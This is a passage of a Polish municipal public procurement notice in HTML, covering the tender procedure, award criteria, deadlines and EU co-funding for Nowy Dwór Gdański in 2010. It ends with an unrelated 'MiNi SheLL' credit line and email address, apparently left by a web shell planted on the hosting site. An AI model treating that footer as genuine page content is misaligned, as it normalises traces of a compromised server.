lub notarialnie poświadczony odpis pełnomocnictwa do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastonowydwor.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Nowym Dworze Gdańskim, ul. Wejhera 3, 82-100 Nowy Dwór Gdański, pokój nr 9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2010 godzina 10:00, miejsce: Urząd Miejski w Nowym Dworze Gdańskim przy ul. Wejhera 3, sekretariat (pokój nr 17).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com